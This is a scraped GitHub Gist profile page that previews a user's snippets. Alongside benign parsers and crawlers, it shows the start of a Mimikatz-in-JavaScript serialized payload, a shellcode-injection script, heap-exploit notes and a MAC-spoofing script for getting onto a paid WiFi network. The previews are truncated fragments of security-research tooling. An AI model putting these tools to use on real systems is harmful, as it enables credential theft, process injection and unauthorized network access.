Skip to content

Instantly share code, notes, and snippets.

View Jack2's full-sized avatar

JAEKI KIM Jack2

View GitHub Profile
@Jack2
Jack2 / olleh_hack
Created August 16, 2017 15:51 — forked from Luavis/olleh_hack
change mac address for ollehWiFi
#!/bin/sh
if [ $# -eq 1 ]
then
if [ "$1" = "spoof" ]
then
sudo ifconfig en0 ether # Your iPhone MAC Adress
echo "spoof to iphone MAC address"
elif [ "$1" = "origin" ]
then
@Jack2
Jack2 / jumin.js
Created August 16, 2017 15:52 — forked from Luavis/jumin.js
대한민국 주민번호 확인 알고리즘
"use strict";
var input = '13자리의 주민번호 - 없이';
var mul = [2,3,4,5,6,7,8,9,2,3,4,5];
var sum = 0;
for(var i =0; i < mul.length; i++) {
var digit = parseInt(input[i]);
sum += digit * mul[i];
}
@Jack2
Jack2 / README.md
Created August 16, 2017 15:52 — forked from allieus/README.md
네이버 블로그 크롤링

네이버 블로그 크롤링

  • 파이썬3 에서 동작합니다.
  • requests, beautifulsoup4 라이브러리가 필요합니다.
pip install requests beautifulsoup4

AskDjango

import os
import docx
from docx.document import Document
from docx.oxml.table import CT_Tbl
from docx.oxml.text.paragraph import CT_P
from docx.table import _Cell, Table
from docx.text.paragraph import Paragraph
os.chdir('C:\\OJT_Kevin\\161027_docx_parsing')
@Jack2
Jack2 / katz.js
Created August 22, 2017 06:26
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
/*
first malloc(16) : 0x1a61450
eh.. and malloc(-1) : (nil)
second malloc(16) : 0x7fe57c0008c0
FYI, libc.so address is : 0x7fe5837dc000
let's calculate! : 0x7fe580000000
*/
#include <stdio.h>
#include <stdlib.h>
/*
first malloc(16) : 0x1a61450
eh.. and malloc(-1) : (nil)
second malloc(16) : 0x7fe57c0008c0
FYI, libc.so address is : 0x7fe5837dc000
let's calculate! : 0x7fe580000000
*/
#include <stdio.h>
#include <stdlib.h>
@Jack2
Jack2 / ida_dump.md
Created November 3, 2017 01:06 — forked from anch0vy/ida_dump.md
IDA에서 dump 분석하기
@Jack2
Jack2 / code_injector.py
Created March 18, 2018 14:54 — forked from RobinDavid/code_injector.py
sample of shellcode injection into a process (Gray Hat Python)
'''
Example taken from Gray Hat Python
The script inject a shellcode which tasks is to kill the given process, so that the process will not be killed by our process directly.
'''
import sys
from ctypes import *
# We set the EXECUTE access mask so that our shellcode will execute in the memory block we have allocated
PAGE_EXECUTE_READWRITE = 0x00000040